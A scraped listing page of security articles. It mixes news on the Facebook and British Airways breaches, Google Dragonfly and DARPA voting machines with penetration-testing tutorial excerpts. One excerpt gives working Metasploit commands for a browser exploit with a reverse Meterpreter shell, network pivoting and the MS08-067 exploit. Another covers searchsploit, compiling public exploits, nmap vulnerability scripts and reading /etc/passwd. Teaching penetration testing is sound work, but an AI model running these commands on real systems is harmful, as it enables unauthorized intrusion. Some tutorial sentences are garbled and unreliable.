Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

172 Articles
article-image-facebook-witnesses-the-biggest-security-breach-since-cambridge-analytica-50m-accounts-compromised
Sugandha Lahoti
01 Oct 2018
4 min read
Save for later

Facebook’s largest security breach in its history leaves 50M user accounts compromised

Sugandha Lahoti
01 Oct 2018
4 min read
Facebook has been going through a massive decline of trust in recent times. And to make matters worse, it has witnessed another massive security breach, last week. On Friday, Facebook announced that nearly 50M Facebook accounts have been compromised by an attack that gave hackers the ability to take over users’ accounts. This security breach has not only affected user’s Facebook accounts but also impacted other accounts linked to Facebook. This means that a hacker could have accessed any account of yours that you log into using Facebook. This security issue was first discovered by Facebook on Tuesday, September 25. The hackers have apparently exploited a series of interactions between three bugs related to Facebook’s “View As” feature that lets people see what their own profile looks like to someone else. The hackers stole Facebook access tokens to take over people’s accounts. These tokens allow an attacker to take full control of the victim’s account, including logging into third-party applications that use Facebook Login. “I’m glad we found this and fixed the vulnerability,” Mark Zuckerberg said on a conference call with reporters on Friday morning. “But it definitely is an issue that this happened in the first place. I think this underscores the attacks that our community and our services face.” As of now, this vulnerability has been fixed and Facebook has contacted law enforcement authorities. The vice-president of product management, Guy Rosen, said that Facebook was working with the FBI, but he did not comment on whether national security agencies were involved in the investigation. As a security measure, Facebook has automatically logged out 90 million Facebook users from their accounts. These included the 50 million that Facebook knows were affected and an additional 40 million that potentially could have been. This attack exploited the complex interaction of multiple issues in Facebook code. It originated from a change made to Facebook’s video uploading feature in July 2017, which impacted “View As.” Facebook says that the affected users will get a message at the top of their News Feed about the issue when they log back into the social network. The message reads, "Your privacy and security are important to us, We want to let you know about recent action we've taken to secure your account." The message is followed by a prompt to click and learn more details. Facebook has also publicly apologized stating that, “People’s privacy and security is incredibly important, and we’re sorry this happened. It’s why we’ve taken immediate action to secure these accounts and let users know what happened.” This is not the end of misery for Facebook. Some users have also tweeted that they are unable to post Facebook’s security breach coverage from The Guardian and Associated Press. When trying to share the story to their news feed, they were met with the error message which prevented them from sharing the story. The error reads, “Our security systems have detected that a lot of people are posting the same content, which could mean that it’s spam. Please try a different post.” People have criticized Facebook’s automated content flagging tools. This is an example of how it tags legitimate content as illegitimate, calling it spam. It has also previously failed to detect harassment and hate speech. However, according to updates on Facebook’s Twitter account, the bug has now been resolved. https://twitter.com/facebook/status/1045796897506516992 The security breach comes at a time when the social media company is already facing multiple criticisms over issues such as foreign election interference, misinformation and hate speech, and data privacy. Recently, an Indie Taiwanese hacker also gained popularity with his plan to take down Mark Zuckerberg’s Facebook page and broadcast it live. However, soon he grew cold feet and said he’ll refrain from doing so after receiving global attention following his announcement. "I am canceling my live feed, I have reported the bug to Facebook and I will show proof when I get a bounty from Facebook," he told Bloomberg News. It’s high time that Facebook began taking it’s user privacy seriously, probably even going in the lines of rethinking it’s algorithm and platform entirely. They should also take responsibility for the real-world consequences of actions enabled by Facebook. How far will Facebook go to fix what it broke: Democracy, Trust, Reality. WhatsApp co-founder reveals why he left Facebook; is called ‘low class’ by a Facebook senior executive. Ex-employee on contract sues Facebook for not protecting content moderators from mental trauma
Read more
  • 0
  • 0
  • 2851

article-image-british-airways-set-to-face-a-record-breaking-fine-of-183m-by-the-ico-over-customer-data-breach
Sugandha Lahoti
08 Jul 2019
6 min read
Save for later

British Airways set to face a record-breaking fine of £183m by the ICO over customer data breach

Sugandha Lahoti
08 Jul 2019
6 min read
UK’s watchdog ICO is all set to fine British Airways more than £183m over a customer data breach. In September last year, British Airways notified ICO about a data breach that compromised personal identification information of over 500,000 customers and is believed to have begun in June 2018. ICO said in a statement, “Following an extensive investigation, the ICO has issued a notice of its intention to fine British Airways £183.39M for infringements of the General Data Protection Regulation (GDPR).” Information Commissioner Elizabeth Denham said, "People's personal data is just that - personal. When an organisation fails to protect it from loss, damage or theft, it is more than an inconvenience. That's why the law is clear - when you are entrusted with personal data, you must look after it. Those that don't will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights." How did the data breach occur? According to the details provided by the British Airways website, payments through its main website and mobile app were affected from 22:58 BST August 21, 2018, until 21:45 BST September 5, 2018. Per ICO’s investigation, user traffic from the British Airways site was being directed to a fraudulent site from where customer details were harvested by the attackers. Personal information compromised included log in, payment card, and travel booking details as well name and address information. The fraudulent site performed what is known as a supply chain attack embedding code from third-party suppliers to run payment authorisation, present ads or allow users to log into external services, etc. According to a cyber-security expert, Prof Alan Woodward at the University of Surrey, the British Airways hack may possibly have been a company insider who tampered with the website and app's code for malicious purposes. He also pointed out that live data was harvested on the site rather than stored data. https://twitter.com/EerkeBoiten/status/1148130739642413056 RiskIQ, a cyber security company based in San Francisco, linked the British Airways attack with the modus operandi of a threat group Magecart. Magecart injects scripts designed to steal sensitive data that consumers enter into online payment forms on e-commerce websites directly or through compromised third-party suppliers. Per RiskIQ, Magecart set up custom, targeted infrastructure to blend in with the British Airways website specifically and to avoid detection for as long as possible. What happens next for British Airways? The ICO noted that British Airways cooperated with its investigation, and has made security improvements since the breach was discovered. They now have 28 days to appeal. Responding to the news, British Airways’ chairman and chief executive Alex Cruz said that the company was “surprised and disappointed” by the ICO’s decision, and added that the company has found no evidence of fraudulent activity on accounts linked to the breach. He said, "British Airways responded quickly to a criminal act to steal customers' data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologise to our customers for any inconvenience this event caused." ICO was appointed as the lead supervisory authority to tackle this case on behalf of other EU Member State data protection authorities. Under the GDPR ‘one stop shop’ provisions the data protection authorities in the EU whose residents have been affected will also have the chance to comment on the ICO’s findings. The penalty is divided up between the other European data authorities, while the money that comes to the ICO goes directly to the Treasury. What is somewhat surprising is that ICO disclosed the fine publicly even before Supervisory Authorities commented on ICOs findings and a final decision has been taken based on their feedback, as pointed by Simon Hania. https://twitter.com/simonhania/status/1148145570961399808 Record breaking fine appreciated by experts The penalty imposed on British Airways is the first one to be made public since GDPR’s new policies about data privacy were introduced. GDPR makes it mandatory to report data security breaches to the information commissioner. They also increased the maximum penalty to 4% of turnover of the penalized company. The fine would be the largest the ICO has ever issued; last ICO fined Facebook £500,000 fine for the Cambridge Analytica scandal, which was the maximum under the 1998 Data Protection Act. The British Airways penalty amounts to 1.5% of its worldwide turnover in 2017, making it roughly 367 times than of Facebook’s. Infact, it could have been even worse if the maximum penalty was levied;  the full 4% of turnover would have meant a fine approaching £500m. Such a massive fine would clearly send a sudden shudder down the spine of any big corporation responsible for handling cybersecurity - if they compromise customers' data, a severe punishment is in order. https://twitter.com/j_opdenakker/status/1148145361799798785 Carl Gottlieb, Privacy Lead & Data Protection Officer at Duolingo has summarized the factoids of this attack in a twitter thread which were much appreciated. GDPR fines are for inappropriate security as opposed to getting breached. Breaches are a good pointer but are not themselves actionable. So organisations need to implement security that is appropriate for their size, means, risk and need. Security is an organisation's responsibility, whether you host IT yourself, outsource it or rely on someone else not getting hacked. The GDPR has teeth against anyone that messes up security, but clearly action will be greatest where the human impact is most significant. Threats of GDPR fines are what created change in privacy and security practices over the last 2 years (not orgs suddenly growing a conscience). And with very few fines so far, improvements have slowed, this will help. Monetary fines are a great example to change behaviour in others, but a TERRIBLE punishment to drive change in an affected organisation. Other enforcement measures, e.g. ceasing processing personal data (e.g. ban new signups) would be much more impactful. https://twitter.com/CarlGottlieb/status/1148119665257963521 Facebook fined $2.3 million by Germany for providing incomplete information about hate speech content European Union fined Google 1.49 billion euros for antitrust violations in online advertising French data regulator, CNIL imposes a fine of 50M euros against Google for failing to comply with GDPR.
Read more
  • 0
  • 0
  • 2837

article-image-using-client-pivot-point
Packt
17 Jun 2014
6 min read
Save for later

Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine the second victim. The scenario is that we get a client to go to our malicious site, and we use an exploit called Use after free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website: The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated. Start up your metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot: One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing. For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the metasploit window: use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.177.170 set LHOST 192.168.177.170 set PAYLOAD windows/meterpreter/reverse_tcp exploit An example of the results of the preceding command is shown in the following screenshot: As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it in Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot: Screen showing an example of what you should see once the exploit is complete and your session is created (the cropped text is not important) We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot: As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell, it provides us with the capability to set the route up. In the shell, enter run autoroute –s 10.2.0.0/24 to set a route up to our 10 network. Once the command is complete, we will view our routing table and enter run autoroute –p to display the routing table. An example of this is shown in the following screenshot: As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will add a background to our session 1; press the Ctrl+ Z to background the session. We will use the scan capability from within our metasploit tool. Enter the following commands: use auxiliary/scanner/portscan/tcp set RHOSTS 10.2.0.0/24 set PORTS 139,445 set THREADS 50 run The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit. Enter nmap –sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results for this scan is shown in the following screenshot: We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Service Server buffer overflow. In the metasploit window, set the session in the background and enter the following commands: use exploit/windows/smb/ms08_067_netapi set RHOST 10.2.0.149 set PAYLOAD windows/meterpreter/bind_tcp exploit If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot: As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected with the Local Pipe | Remote Pipe reference. Once you complete reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot: Summary In this article, we looked at the powerful technique of establishing a pivot point from a client. Resources for Article: Further resources on this subject: Installation of Oracle VM VirtualBox on Linux [article] Using Virtual Destinations (Advanced) [article] Quick Start into Selenium Tests [article]
Read more
  • 0
  • 0
  • 2827
Visually different images

article-image-google-bypassed-its-own-security-and-privacy-teams-for-project-dragonfly-reveals-intercept
Sugandha Lahoti
30 Nov 2018
5 min read
Save for later

Google bypassed its own security and privacy teams for Project Dragonfly reveals Intercept

Sugandha Lahoti
30 Nov 2018
5 min read
Google’s Project Dragonfly has faced significant criticism and scrutiny from both the public and Google employees. In a major report yesterday, the Intercept revealed how internal conversations around Google’s censored search engine for China shut out Google’s legal, privacy, and security teams. According to named and anonymous senior Googlers who worked on the project and spoke to The Intercept's Ryan Gallagher, Company executives appeared intent on watering down the privacy review. Google bosses also worked to suppress employee criticism of the censored search engine. Project Dragonfly is the secretive search engine that Google is allegedly developing which will comply with the Chinese rules of censorship. It was kept secret from the company at large during the 18 months it was in development until an insider leak led to its existence being revealed in The Intercept. It has been on the receiving end of a constant backlash from various human rights organizations and investigative reporters, since then. Earlier this week, it also faced criticism from human rights organization Amnesty International and was followed by Google employees signing a petition protesting Google’s infamous Project Dragonfly. The secretive way Google operated Dragonfly Majority of the leaks were reported by Yonatan Zunger, a security engineer on the Dragonfly team. He was asked to produce the privacy review for the project in early 2017. However, he faced opposition from Scott Beaumont, Google’s top executive for China and Korea. According to Zunger, Beaumont “wanted the privacy review of Dragonfly]to be pro forma and thought it should defer entirely to his views of what the product ought to be. He did not feel that the security, privacy, and legal teams should be able to question his product decisions, and maintained an openly adversarial relationship with them — quite outside the Google norm.” Beaumont also micromanaged the project and ensured that discussions about Dragonfly and access to documents about it were under his tight control. If some members of the Dragonfly team broke the strict confidentiality rules, then their contracts at Google could be terminated. Privacy report by Zunger In midst of all these conditions, Zunger and his team were still able to produce a privacy report. The report mentioned problematic scenarios that could arise if the search engine was launched in China. The report mentioned that, in China, it would be difficult for Google to legally push back against government requests, refuse to build systems specifically for surveillance, or even notify people of how their data may be used. Zunger’s meetings with the company’s senior leadership on the discussion of the privacy report were repeatedly postponed. Zunger said, “When the meeting did finally take place, in late June 2017, I and my team were not notified, so we missed it and did not attend. This was a deliberate attempt to exclude us.” Dragonfly: Not just an experiment Intercept’s report even demolished Sundar Pichai’s recent public statement on Dragonfly, where he described it as “just an experiment,” adding that it remained unclear whether the company “would or could” eventually launch it in China. Google employees were surprised as they were told to prepare the search engine for launch between January and April 2019, or sooner. “What Pichai said [about Dragonfly being an experiment] was ultimately horse shit,” said one Google source with knowledge of the project. “This was run with 100 percent intention of launch from day one. He was just trying to walk back a delicate political situation.” It is also alleged that Beaumont had intended from day one that the project should only be known about once it had been launched. “He wanted to make sure there would be no opportunity for any internal or external resistance to Dragonfly.” said one Google source to Intercept. This makes us wonder the extent to which Google really is concerned about upholding its founding values, and how far it will go in advocating internet freedom, openness, and democracy. It now looks a lot like a company who simply prioritizes growth and expansion into new markets, even if it means compromising on issues like internet censorship and surveillance. Perhaps we shouldn’t be surprised. Google CEO Sundar Pichai is expected to testify in Congress on Dec. 5 to discuss transparency and bias. Members of Congress will likely also ask about Google's plans in China. Public opinion on Intercept’s report is largely supportive. https://twitter.com/DennGordon/status/1068228199149125634 https://twitter.com/mpjme/status/1068268991238541312 https://twitter.com/cynthiamw/status/1068240969990983680 Google employee and inclusion activist Liz Fong Jones tweeted that she would match $100,000 in pledged donations to a fund to support employees who refuse to work in protest. https://twitter.com/lizthegrey/status/1068212346236096513 She has also shown full support for Zunger https://twitter.com/lizthegrey/status/1068209548320747521 Google employees join hands with Amnesty International urging Google to drop Project Dragonfly OK Google, why are you ok with mut(at)ing your ethos for Project DragonFly? Amnesty International takes on Google over Chinese censored search engine, Project Dragonfly.
Read more
  • 0
  • 0
  • 2804

article-image-at-defcon-27-darpas-10-million-voting-system-could-not-be-hacked-by-voting-village-hackers-due-to-a-bug
Savia Lobo
12 Aug 2019
4 min read
Save for later

At DefCon 27, DARPA's $10 million voting system could not be hacked by Voting Village hackers due to a bug

Savia Lobo
12 Aug 2019
4 min read
At the DefCon security conference in Las Vegas, for the last two years, hackers have come to the Voting Village every year to scrutinize voting machines and analyze them for vulnerabilities. This year, at DefCon 27, the targeted voting machine included a $10 million project by DARPA (Defense Advanced Research Projects Agency). However, hackers were unable to break into the system, not because of robust security features, but due to technical difficulties during the setup. “A bug in the machines didn't allow hackers to access their systems over the first two days,” CNet reports. DARPA announced this voting system in March, this year, hoping that it “will be impervious to hacking”. The system will be designed by the Oregon-based verifiable systems firm, Galois. “The agency hopes to use voting machines as a model system for developing a secure hardware platform—meaning that the group is designing all the chips that go into a computer from the ground up, and isn’t using proprietary components from companies like Intel or AMD,” Wired reports. Linton Salmon, the project’s program manager at Darpa says, “The goal of the program is to develop these tools to provide security against hardware vulnerabilities. Our goal is to protect against remote attacks.” Voting Village's co-founder Harri Hursti said, the five machines brought in by Galois, “seemed to have had a myriad of different kinds of problems. Unfortunately, when you're pushing the envelope on technology, these kinds of things happen." “The Darpa machines are prototypes, currently running on virtualized versions of the hardware platforms they will eventually use.” However, at Voting Village 2020, Darpa plans to include complete systems for hackers to access. Dan Zimmerman, principal researcher at Galois said, “All of this is here for people to poke at. I don’t think anyone has found any bugs or issues yet, but we want people to find things. We’re going to make a small board solely for the purpose of letting people test the secure hardware in their homes and classrooms and we’ll release that.” Sen. Wyden says if voting system security standards fail to change, the consequences will be much worse than 2016 elections After the cyberattacks in the 2016 U.S. presidential elections, there is a higher risk of securing voters data in the upcoming presidential elections next year. Senator Ron Wyden said if the voting system security standards fail to change, the consequences could be far worse than the 2016 elections. In his speech on Friday at the Voting Village, Wyden said, "If nothing happens, the kind of interference we will see form hostile foreign actors will make 2016 look like child's play. We're just not prepared, not even close, to stop it." Wyden proposed an election security bill requiring paper ballots in 2018. However, the bill was blocked in the Senate by Majority Leader Mitch McConnell who called the bill a partisan legislation. On Friday, a furious Wyden held McConnell responsible calling him the reason why Congress hasn't been able to fix election security issues. "It sure seems like Russia's No. 1 ally in compromising American election security is Mitch McConnell," Wyden said. https://twitter.com/ericgeller/status/1159929940533321728 According to a security researcher, the voting system has a terrible software vulnerability Dan Wallach, a security researcher at Rice University in Houston, Texas told Wired, “There’s a terrible software vulnerability in there. I know because I wrote it. It’s a web server that anyone can connect to and read/write arbitrary memory. That’s so bad. But the idea is that even with that in there, an attacker still won’t be able to get to things like crypto keys or anything really. All they would be able to do right now is crash the system.” According to CNet, “While the voting process worked, the machines weren't able to connect with external devices, which hackers would need in order to test for vulnerabilities. One machine couldn't connect to any networks, while another had a test suite that didn't run, and a third machine couldn't get online.” The machine's prototype allows people to vote with a touchscreen, print out their ballot and insert it into the verification machine, which ensures that votes are valid through a security scan. According to Wired, Galois even added vulnerabilities on purpose to see how its system defended against flaws. https://twitter.com/VotingVillageDC/status/1160663776884154369 To know more about this news in detail, head over to Wired report. DARPA plans to develop a communication platform similar to WhatsApp DARPA’s $2 Billion ‘AI Next’ campaign includes a Next-Generation Nonsurgical Neurotechnology (N3) program Black Hat USA 2019 conference Highlights: IBM’s ‘warshipping’, OS threat intelligence bots, Apple’s $1M bug bounty programs and much more!
Read more
  • 0
  • 0
  • 2804

article-image-vulnerability-assessment
Packt
21 Jul 2017
11 min read
Save for later

Vulnerability Assessment

Packt
21 Jul 2017
11 min read
"Finding a risk is learning, Ability to identify risk exposure is a skill and exploiting it is merely a choice" In this article by Vijay Kumar Velu, the author of the book Mastering Kali Linux for Advanced Penetration Testing - Second Edition, we will learn about vulnerability assessment. The goal of passive and active reconnaissance is to identify the exploitable target and vulnerability assessment is to find the security flaws that are most likely to support the tester's or attacker's objective (denial of service, theft, or modification of data). The vulnerability assessment during the exploit phase of the kill chain focuses on creating the access to achieve the objective—mapping of the vulnerabilities to line up the exploits to maintain the persistent access to the target. Thousands of exploitable vulnerabilities have been identified, and most are associated with at least one proof-of-concept code or technique to allow the system to be compromised. Nevertheless, the underlying principles that govern success are the same across networks, operating systems, and applications. In this article, you will learn: Using online and local vulnerability resources Vulnerability scanning with nmap Vulnerability nomenclature Vulnerability scanning employs automated processes and applications to identify vulnerabilities in a network, system, operating system, or application that may be exploitable. When performed correctly, a vulnerability scan delivers an inventory of devices (both authorized and rogue devices); known vulnerabilities that have been actively scanned for, and usually a confirmation of how compliant the devices are with various policies and regulations. Unfortunately, vulnerability scans are loud—they deliver multiple packets that are easily detected by most network controls and make stealth almost impossible to achieve. They also suffer from the following additional limitations: For the most part, vulnerability scanners are signature based—they can only detect known vulnerabilities, and only if there is an existing recognition signature that the scanner can apply to the target. To a penetration tester, the most effective scanners are open source and they allow the tester to rapidly modify code to detect new vulnerabilities. Scanners produce large volumes of output, frequently containing false-positive results that can lead a tester astray; in particular, networks with different operating systems can produce false-positives with a rate as high as 70 percent. Scanners may have a negative impact on the network—they can create network latency or cause the failure of some devices (refer to the Network Scanning Watch List at www.digininja.org, for devices known to fail as a result of vulnerability testing). In certain jurisdictions, scanning is considered as hacking, and may constitute an illegal act. There are multiple commercial and open source products that perform vulnerability scans. Local and online vulnerability databases Together, passive and active reconnaissance identifies the attack surface of the target, that is, the total number of points that can be assessed for vulnerabilities. A server with just an operating system installed can only be exploited if there are vulnerabilities in that particular operating system; however, the number of potential vulnerabilities increases with each application that is installed. Penetration testers and attackers must find the particular exploits that will compromise known and suspected vulnerabilities. The first place to start the search is at vendor sites; most hardware and application vendors release information about vulnerabilities when they release patches and upgrades. If an exploit for a particular weakness is known, most vendors will highlight this to their customers. Although their intent is to allow customers to test for the presence of the vulnerability themselves, attackers and penetration testers will take advantage of this information as well. Other online sites that collect, analyze, and share information about vulnerabilities are as follows: The National vulnerability database that consolidates all public vulnerability data released by the US Government available at http://web.nvd.nist.gov/view/vuln/search Secunia available at http://secunia.com/community/ Open Source Vulnerability Database Project (OSVDP) available at http://www.osvdb.org/search/advsearch Packetstorm security available at http://packetstormsecurity.com/ SecurityFocus available at http://www.securityfocus.com/vulnerabilities Inj3ct0r available at http://1337day.com/ The Exploit database maintained by Offensive Security available at http://www.db-exploit.com The Exploit database is also copied locally to Kali and it can be found in the /usr/share/exploitdb directory. Before using it, make sure that it has been updated using the following command: cd /usr/share/exploitdb wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjfarchive.tar.bz2 rmarchive.tar.bz2 To search the local copy of exploitdb, open a Terminal window and enter searchsploit and the desired search term(s) in the Command Prompt. This will invoke a script that searches a database file (.csv) that contains a list of all exploits. The search will return a description of known vulnerabilities as well as the path to a relevant exploit. The exploit can be extracted, compiled, and run against specific vulnerabilities. Take a look at the following screenshot, which shows the description of the vulnerabilities: The search script scans for each line in the CSV file from left to right, so the order of the search terms is important—a search for Oracle 10g will return several exploits, but 10g Oracle will not return any. Also, the script is weirdly case sensitive; although you are instructed to use lower case characters in the search term, a search for bulletproof FTP returns no hits, but bulletproof FTP returns seven hits, and bulletproof FTP returns no hits. More effective searches of the CSV file can be conducted using the grep command or a search tool such as KWrite (apt-get install kwrite). A search of the local database may identify several possible exploits with a description and a path listing; however, these will have to be customized to your environment, and then compiled prior to use. Copy the exploit to the /tmp directory (the given path does not take into account that the /windows/remote directory resides in the /platforms directory). Exploits presented as scripts such as Perl, Ruby, and PHP are relatively easy to implement. For example, if the target is a Microsoft II 6.0 server that may be vulnerable to a WebDAV remote authentication bypass, copy the exploit to the root directory and then execute as a standard Perl script, as shown in the following screenshot: Many of the exploits are available as source code that must be compiled before use. For example, a search for RPC-specific vulnerabilities identifies several possible exploits. An excerpt is shown in the following screenshot: The RPC DCOM vulnerability identified as 76.c is known from practice to be relatively stable. So we will use it as an example. To compile this exploit, copy it from the storage directory to the /tmp directory. In that location, compile it using GCC with the command as follows: root@kali:~# gcc76.c -o 76.exe This will use the GNU Compiler Collection application to compile 76.c to a file with the output (-o) name of 76.exe, as shown in the following screenshot: When you invoke the application against the target, you must call the executable (which is not stored in the /tmp directory) using a symbolic link as follows: root@kali:~# ./76.exe The source code for this exploit is well documented and the required parameters are clear at the execution, as shown in the following screenshot: Unfortunately, not all exploits from exploit database and other public sources compiled as readily as 76.c. There are several issues that make the use of such exploits problematic, even dangerous, for penetration testers listed as follows: Deliberate errors or incomplete source code are commonly encountered as experienced developers attempt to keep exploits away from inexperienced users, especially beginners who are trying to compromise systems without knowing the risks that go with their actions. Exploits are not always sufficiently documented; after all, there is no standard that governs the creation and use of code intended to be used to compromise a data system. As a result, they can be difficult to use, particularly for testers who lack expertise in application development. Inconsistent behaviors due to changing environments (new patches applied to the target system and language variations in the target application) may require significant alterations to the source code; again, this may require a skilled developer. There is always the risk of freely available code containing malicious functionalities. A penetration tester may think that they are conducting a proof of concept (POC) exercise and will be unaware that the exploit has also created a backdoor in the application being tested that could be used by the developer. To ensure consistent results and create a community of coders who follow consistent practices, several exploit frameworks have been developed. The most popular exploitation framework is the Metasploit framework. Vulnerability scanning with nmap There are no security operating distributions without nmap, so far we have discussed how to utilize nmap during active reconnaissance, but attackers don't just use nmap to find open ports and services, but also engage the nmap to perform the vulnerability assessment. As of 10 March 2017, the latest version of nmap is 7.40 and it ships with 500+ NSE (nmap scripting engine) scripts, as shown in the following screenshot: Penetration testers utilize nmap's most powerful and flexible features, which allows them to write their own scripts and also automate them to ease the exploitation. Primarily the NSE was developed for the following reasons: Network discovery: Primary purpose that attackers would utilize the nmap is for the network discovery. Classier version detection of a service: There are 1000's of services with multiple version details to the same service, so make it more sophisticated. Vulnerability detection: To automatically identify vulnerability in a vast network range; however, nmap itself cannot be a fully vulnerability scanner in itself. Backdoor detection: Some of the scripts are written to identify the pattern if there are any worms infections on the network, it makes the attackers job easy to narrow down and focus on taking over the machine remotely. Vulnerability exploitation: Attackers can also potentially utilize nmap to perform exploitation in combination with other tools such as Metasploit or write a custom reverse shell code and combine nmap's capability of exploitation. Before firing the nmap to perform the vulnerability scan, penetration testers must update the nmap script db to see if there are any new scripts added to the database so that they don't miss the vulnerability identification: nmap –script-updatedb Running for all the scripts against the target host: nmap-T4 -A -sV -v3 -d –oATargetoutput --script all --script-argsvulns.showalltarget.com Introduction to LUA scripting Light weight embeddable scripting language, which is built on top of the C programming language, was created in Brazil in 1993 and is still actively developed. It is a powerful and fast programming language mostly used in gaming applications and image processing. Complete source code, manual, plus binaries for some platforms do not go beyond 1.44 MB (which is less than a floppy disk). Some of the security tools that are developed in LUA are nmap, Wireshark, and Snort 3.0. One of the reasons why LUA is chosen to be the scripting language in Information security is due to the compactness, no buffer overflows and format string vulnerabilities, and it can be interpreted. LUA can be installed directly to Kali Linux by issuing the apt-get install lua5.1 command on the Terminal. The following code extract is the sample script to read the file and print the first line: #!/usr/bin/lua local file = io.open("/etc/passwd", "r") contents = file:read() file:close() print (contents) LUA is similar to any other scripting such as bash and PERL scripting. The preceding script should produce the output as shown in the following screenshot: Customizing NSE scripts In order to achieve maximum effectiveness, customization of scripts helps penetration testers in finding the right vulnerabilities within the given span of time. However, attackers do not have the time limit. The following code extract is a LUANSE script to identify a specific file location that we will search on the entire subnet using nmap: local http=require 'http' description = [[ This is my custom discovery on the network ]] categories = {"safe","discovery"} require("http") functionportrule(host, port) returnport.number == 80 end function action(host, port) local response response = http.get(host, port, "/test.txt") ifresponse.status and response.status ~= 404 then return "successful" end end Save the file into the /usr/share/nmap/scripts/ folder. Finally, your script is ready to be tested as shown in the following screenshot; you must be able to run your own NSE script without any problems: To completely understand the preceding NSE script here is the description of what is in the code: local http: requires HTTP – calling the right library from the LUA, the line calls the HTTP script and made it a local request. Description: Where testers/researchers can enter the description of the script. Categories: This typically has two variables, where one declares whether it is safe or intrusive.  
Read more
  • 0
  • 0
  • 2794
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $15.99/month. Cancel anytime
article-image-spring-security-3-tips-and-tricks
Packt
28 Feb 2011
6 min read
Save for later

Spring Security 3: Tips and Tricks

Packt
28 Feb 2011
6 min read
  Spring Security 3 Make your web applications impenetrable. Implement authentication and authorization of users. Integrate Spring Security 3 with common external security providers. Packed full with concrete, simple, and concise examples. It's a good idea to change the default value of the spring_security_login page URL. Tip: Not only would the resulting URL be more user- or search-engine friendly, it'll disguise the fact that you're using Spring Security as your security implementation. Obscuring Spring Security in this way could make it harder for malicious hackers to find holes in your site in the unlikely event that a security hole is discovered in Spring Security. Although security through obscurity does not reduce your application's vulnerability, it does make it harder for standardized hacking tools to determine what types of vulnerabilities you may be susceptible to.   Evaluating authorization rules Tip: For any given URL request, Spring Security evaluates authorization rules in top to bottom order. The first rule matching the URL pattern will be applied. Typically, this means that your authorization rules will be ordered starting from most-specific to least-specific order. It's important to remember this when developing complicated rule sets, as developers can often get confused over which authorization rule takes effect. Just remember the top to bottom order, and you can easily find the correct rule in any scenario!   Using the JSTL URL tag to handle relative URLs Tip: : Use the JSTL core library's url tag to ensure that URLs you provide in your JSP pages resolve correctly in the context of your deployed web application. The url tag will resolve URLs provided as relative URLs (starting with a /) to the root of the web application. You may have seen other techniques to do this using JSP expression code (<%=request.getContextPath() %>), but the JSTL url tag allows you to avoid inline code!   Modifying username or password and the remember me Feature Tip: You have anticipated that if the user changes their username or password, any remember me tokens set will no longer be valid. Make sure that you provide appropriate messaging to users if you allow them to change these bits of their account.   Configuration of remember me session cookies Tip: If token-validity-seconds is set to -1, the login cookie will be set to a session cookie, which does not persist after the user closes their browser. The token will be valid (assuming the user doesn't close their browser) for a non-configurable length of 2 weeks. Don't confuse this with the cookie that stores your user's session ID—they're two different things with similar names!   Checking Full Authentication without Expressions Tip: If your application does not use SpEL expressions for access declarations, you can still check if the user is fully authenticated by using the IS_ AUTHENTICATED_FULLY access rule (For example, .access="IS_AUTHENTICATED_FULLY"). Be aware, however, that standard role access declarations aren't as expressive as SpEL ones, so you will have trouble handling complex boolean expressions.   Debugging remember me cookies Tip: There are two difficulties when attempting to debug issues with remember me cookies. The first is getting the cookie value at all! Spring Security doesn't offer any log level that will log the cookie value that was set. We'd suggest a browser-based tool such as Chris Pederick's Web Developer plug-in (http://chrispederick.com/work/web-developer/) for Mozilla Firefox. Browser-based development tools 